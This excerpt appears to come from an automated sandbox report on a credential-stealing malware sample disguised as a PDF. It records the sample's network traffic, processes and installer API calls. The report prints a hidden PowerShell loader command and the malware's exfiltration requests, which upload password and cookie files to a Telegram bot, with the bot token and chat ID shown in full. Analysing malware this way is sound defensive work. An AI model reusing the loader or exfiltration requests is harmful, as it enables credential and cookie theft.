2024-12-02 15:15:38 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49839	149.154.167.220	443	7852	C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 15:15:40 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:405464%0D%0ADate%20and%20Time:%2003/12/2024%20/%2017:47:34%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20405464%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-12-02 15:15:40 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Mon, 02 Dec 2024 15:15:40 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-02 15:15:40 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49855	149.154.167.220	443	7852	C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 15:15:48 UTC	344	OUT	POST /bot8138030788:AAEti5Rsvkh3t9x1DE3f72xKiRnG5XE9PkI/sendDocument?chat_id=7844469787&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd144b65092187 Host: api.telegram.org Content-Length: 581
2024-12-02 15:15:48 UTC	581	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 34 34 62 36 35 30 39 32 31 38 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 30 35 34 36 34 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 30 32 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 34 3a 35 39 0d Data Ascii: --------------------------8dd144b65092187Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:405464Date and Time: 02/12/2024 / 10:14:59
2024-12-02 15:15:49 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Dec 2024 15:15:49 GMT Content-Type: application/json Content-Length: 528 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-02 15:15:49 UTC	528	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 35 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 38 31 33 38 30 33 30 37 38 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4b 69 6e 64 6f 6e 6a 75 65 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4b 68 69 6a 6e 64 6a 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 38 34 34 34 36 39 37 38 37 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 75 72 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 42 69 6c 6c 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 75 72 65 79 6c 62 69 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 31 35 32 35 34 39 2c 22 64 6f 63 75 6d 65 Data Ascii: {"ok":true,"result":{"message_id":59,"from":{"id":8138030788,"is_bot":true,"first_name":"Kindonjueh","username":"Khijndjbot"},"chat":{"id":7844469787,"first_name":"Sure","last_name":"Bill","username":"Sureylbit","type":"private"},"date":1733152549,"docume

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49863	149.154.167.220	443	7852	C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 15:15:52 UTC	374	OUT	POST /bot8138030788:AAEti5Rsvkh3t9x1DE3f72xKiRnG5XE9PkI/sendDocument?chat_id=7844469787&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd1476a1d87ad0 Host: api.telegram.org Content-Length: 7046 Connection: Keep-Alive
2024-12-02 15:15:52 UTC	7046	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 34 37 36 61 31 64 38 37 61 64 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 6f 6f 6b 69 65 73 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 43 6f 6f 6b 69 65 73 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 30 35 34 36 34 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 30 32 2f 31 32 2f 32 30 32 34 20 2f Data Ascii: --------------------------8dd1476a1d87ad0Content-Disposition: form-data; name="document"; filename="Cookies_Recovered.txt"Content-Type: application/x-ms-dos-executableCookies \| user \| VIP Recovery PC Name:405464Date and Time: 02/12/2024 /
2024-12-02 15:15:52 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Dec 2024 15:15:52 GMT Content-Type: application/json Content-Length: 539 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-02 15:15:52 UTC	539	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 38 31 33 38 30 33 30 37 38 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4b 69 6e 64 6f 6e 6a 75 65 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4b 68 69 6a 6e 64 6a 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 38 34 34 34 36 39 37 38 37 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 75 72 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 42 69 6c 6c 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 75 72 65 79 6c 62 69 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 31 35 32 35 35 32 2c 22 64 6f 63 75 6d 65 Data Ascii: {"ok":true,"result":{"message_id":60,"from":{"id":8138030788,"is_bot":true,"first_name":"Kindonjueh","username":"Khijndjbot"},"chat":{"id":7844469787,"first_name":"Sure","last_name":"Bill","username":"Sureylbit","type":"private"},"date":1733152552,"docume

Target ID:	0
Start time:	10:13:57
Start date:	02/12/2024
Path:	C:\Users\user\Desktop\678763_PDF.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\678763_PDF.exe"
Imagebase:	0x400000
File size:	711'659 bytes
MD5 hash:	42B3EEFF606C41053B2B30E6DF1BAA87
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	10:13:58
Start date:	02/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell.exe -windowstyle hidden "$Epigraphic93=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\Internist\Hyperimmune.Mus';$Miljerne=$Epigraphic93.SubString(70004,3);.$Miljerne($Epigraphic93) "
Imagebase:	0x830000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.2156462288.000000000A4F3000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	10:13:58
Start date:	02/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	10:14:44
Start date:	02/12/2024
Path:	C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe"
Imagebase:	0x400000
File size:	711'659 bytes
MD5 hash:	42B3EEFF606C41053B2B30E6DF1BAA87
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.2955973665.0000000020D4F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.2955973665.0000000020D4F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2955973665.0000000020CD8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.2955973665.0000000020BD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 16%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	22.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	16.5%
Total number of Nodes:	1350
Total number of Limit Nodes:	30

Executed Functions

Function 00403532 Relevance: 86.2, APIs: 32, Strings: 17, Instructions: 464
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 00403555
GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 00403580
GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 00403593
lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040362C
#17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403669
OleInitialize.OLE32(00000000), ref: 00403670
SHGetFileInfoW.SHELL32(0042AA28,00000000,?,000002B4,00000000), ref: 0040368F
GetCommandLineW.KERNEL32(00433700,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004036A4
CharNextW.USER32(00000000,"C:\Users\user\Desktop\678763_PDF.exe",00000020,"C:\Users\user\Desktop\678763_PDF.exe",00000000,?,00000008,0000000A,0000000C), ref: 004036DD
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403815
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403826
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403832
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403846
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040384E
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040385F
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403867
DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040387B
lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\678763_PDF.exe",00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403954

Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564

wsprintfW.USER32 ref: 004039B1
GetFileAttributesW.KERNEL32( ohowno",C:\Users\user\AppData\Local\Temp\), ref: 004039E4
DeleteFileW.KERNEL32( ohowno"), ref: 004039F0
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403A1E

Part of subcall function 00406317: MoveFileExW.KERNEL32(?,?,00000005,00405E15,?,00000000,000000F1,?,?,?,?,?), ref: 00406321

CopyFileW.KERNEL32(C:\Users\user\Desktop\678763_PDF.exe, ohowno",00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403A34

Part of subcall function 00405B3A: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?, ohowno",?), ref: 00405B63
Part of subcall function 00405B3A: CloseHandle.KERNEL32(?,?,?, ohowno",?), ref: 00405B70

Part of subcall function 004068B4: FindFirstFileW.KERNELBASE(74DF3420,0042FAB8,C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,00405F77,C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 004068BF
Part of subcall function 004068B4: FindClose.KERNEL32(00000000), ref: 004068CB

OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A82
ExitProcess.KERNEL32 ref: 00403A9F
CloseHandle.KERNEL32(00000000,00438000,00438000,?, ohowno",00000000), ref: 00403AA6
GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403AC2
OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AC9
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403ADE
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403B01
ExitWindowsEx.USER32(00000002,80040002), ref: 00403B26
ExitProcess.KERNEL32 ref: 00403B49

Part of subcall function 00405B05: CreateDirectoryW.KERNELBASE(?,00000000,00403525,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405B0B

Strings

C:\Users\user\Desktop\678763_PDF.exe, xrefs: 00403A2F
\Temp, xrefs: 0040382C
C:\Users\user\AppData\Local\Temp\, xrefs: 0040380A, 0040380F, 00403825, 00403831, 00403840, 0040384D, 00403859, 00403861, 0040394F, 004039D0, 004039FC, 00403A1D, 00403A26
NSIS Error, xrefs: 00403695
SeShutdownPrivilege, xrefs: 00403AD8
C:\Users\user\AppData\Roaming\erstatningsgraden, xrefs: 00403927
ohowno", xrefs: 00403994, 004039C5, 004039E3, 004039EF, 00403A2E, 00403A40, 00403A6D
Error launching installer, xrefs: 004038FD
C:\Users\user\Desktop, xrefs: 00403972
TMP, xrefs: 00403862
Low, xrefs: 00403848
C:\Users\user\AppData\Roaming\erstatningsgraden, xrefs: 004037FA, 0040391C, 00403969, 00403977
"C:\Users\user\Desktop\678763_PDF.exe", xrefs: 004036AA, 004036B0, 004036C5, 004038A3
TEMP, xrefs: 0040385A
~nsu%X.tmp, xrefs: 004039A8
1033, xrefs: 00403876
UXTHEME, xrefs: 00403620, 00403625, 0040362B

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
String ID: ohowno"$"C:\Users\user\Desktop\678763_PDF.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\erstatningsgraden$C:\Users\user\AppData\Roaming\erstatningsgraden$C:\Users\user\Desktop$C:\Users\user\Desktop\678763_PDF.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
API String ID: 1813718867-2816618860
Opcode ID: 2f58fbcc075b23529aa9588561da4342b8d2734b046618fffc698aa71994b29c
Instruction ID: 6c1349364f4d22fadfcc29bbd5f82b0434b4f5ba6e08f6571c64e8404a3f48da
Opcode Fuzzy Hash: 2f58fbcc075b23529aa9588561da4342b8d2734b046618fffc698aa71994b29c
Instruction Fuzzy Hash: 64F10270604301ABD320AF659D45B2B7AE8EF8570AF10483EF581B22D1DB7DDA45CB6E

Function 0040571B Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 00405779
GetDlgItem.USER32(?,000003EE), ref: 00405788
GetClientRect.USER32(?,?), ref: 004057C5
GetSystemMetrics.USER32(00000002), ref: 004057CC
SendMessageW.USER32(?,00001061,00000000,?), ref: 004057ED
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057FE
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405811
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040581F
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405832
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405854
ShowWindow.USER32(?,00000008), ref: 00405868
GetDlgItem.USER32(?,000003EC), ref: 00405889
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405899
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004058B2
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004058BE
GetDlgItem.USER32(?,000003F8), ref: 00405797

Part of subcall function 0040450B: SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519

GetDlgItem.USER32(?,000003EC), ref: 004058DB
CreateThread.KERNELBASE(00000000,00000000,Function_000056AF,00000000), ref: 004058E9
CloseHandle.KERNELBASE(00000000), ref: 004058F0
ShowWindow.USER32(00000000), ref: 00405914
ShowWindow.USER32(?,00000008), ref: 00405919
ShowWindow.USER32(00000008), ref: 00405963
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405997
CreatePopupMenu.USER32 ref: 004059A8
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004059BC
GetWindowRect.USER32(?,?), ref: 004059DC
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059F5
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A2D
OpenClipboard.USER32(00000000), ref: 00405A3D
EmptyClipboard.USER32 ref: 00405A43
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A4F
GlobalLock.KERNEL32(00000000), ref: 00405A59
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A6D
GlobalUnlock.KERNEL32(00000000), ref: 00405A8D
SetClipboardData.USER32(0000000D,00000000), ref: 00405A98
CloseClipboard.USER32 ref: 00405A9E

Strings

{, xrefs: 00405981

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 6951b3530aa72caf7521df0bf8db88f5d1408e2bb92485539c1303395de87c8c
Instruction ID: 234ab3d0ec1f6487b719ed7b99e1d6b4405f443d9e8d78e252fa94ab3ac4d3a1
Opcode Fuzzy Hash: 6951b3530aa72caf7521df0bf8db88f5d1408e2bb92485539c1303395de87c8c
Instruction Fuzzy Hash: 34B139B1900608FFDB11AF60DD89AAE7B79FB48355F00813AFA41BA1A0C7785A51DF58

Function 00405C63 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\678763_PDF.exe"), ref: 00405C8C
lstrcatW.KERNEL32(0042EA70,\*.*,0042EA70,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\678763_PDF.exe"), ref: 00405CD4
lstrcatW.KERNEL32(?,0040A014,?,0042EA70,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\678763_PDF.exe"), ref: 00405CF7
lstrlenW.KERNEL32(?,?,0040A014,?,0042EA70,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\678763_PDF.exe"), ref: 00405CFD
FindFirstFileW.KERNEL32(0042EA70,?,?,?,0040A014,?,0042EA70,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\678763_PDF.exe"), ref: 00405D0D
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405DAD
FindClose.KERNEL32(00000000), ref: 00405DBC

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405C70
pB, xrefs: 00405CBC
"C:\Users\user\Desktop\678763_PDF.exe", xrefs: 00405C6C
\*.*, xrefs: 00405CCE

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
